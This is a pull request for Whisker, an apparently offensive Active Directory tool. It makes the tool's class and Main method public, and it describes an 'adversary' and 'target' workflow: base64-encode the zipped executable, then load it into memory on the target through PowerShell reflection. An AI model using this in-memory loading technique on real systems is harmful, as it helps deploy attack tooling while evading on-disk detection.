### PR TITLE
making class and main function as public

### DIFF
--- a/Whisker/Program.cs
+++ b/Whisker/Program.cs
@@ -10,7 +10,7 @@ using System.Reflection;
 
 namespace Whisker
 {
-    class Program
+    public class Program
     {
         //Code taken from Rubeus
         private static DirectoryEntry GetLdapSearchRoot(string OUName, string domainController, string domain)
@@ -251,7 +251,7 @@ This tool is based on code from DSInternals by Michael Grafnetter (@MGrafnetter)
             );
         }
 
-        static void Main(string[] args)
+        public static void Main(string[] args)
         {
             try
             {


### PR DESCRIPTION
Update the [`Program` class](https://github.com/InfamousSYN/Whisker/blob/f819bc7e225fb97918b2e68ea8d4fa6d010c2399/Whisker/Program.cs#L13) and [`Main` function](https://github.com/InfamousSYN/Whisker/blob/f819bc7e225fb97918b2e68ea8d4fa6d010c2399/Whisker/Program.cs#L254) as public to allow the tool be loaded as assembly. 

## Workflow

### Adversary machine

1. Make changes to the affected lines, recompile the tool
2. Package the .exe into a .zip using
3. Base64 encode the .zip file

```
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\Whisker.zip")) | Out-File -Encoding ASCII C:\Tools\Whisker.txt
```

### Target machine
1. copy the base64 encoded string via clipboard and paste into powershell

```
$infile = "[BASE64 BLOB]"
```

2. Reverse the base64 encoding and unpack the .zip file with the following command

```
$stream = [System.IO.MemoryStream]::new([Convert]::FromBase64String($infile))
$zipArchive = [System.IO.Compression.ZipArchive]::new($stream)
$bytes = $zipArchive.Entries[0].Open()

$assemblyStream = [System.IO.MemoryStream]::new()
$bytes.CopyTo($assemblyStream)
$WhiskerAssembly = [System.Reflection.Assembly]::Load($assemblyStream.ToArray())
```


3. Confirm the successful load

```
[Whisker.Program]::Main("".split())
```
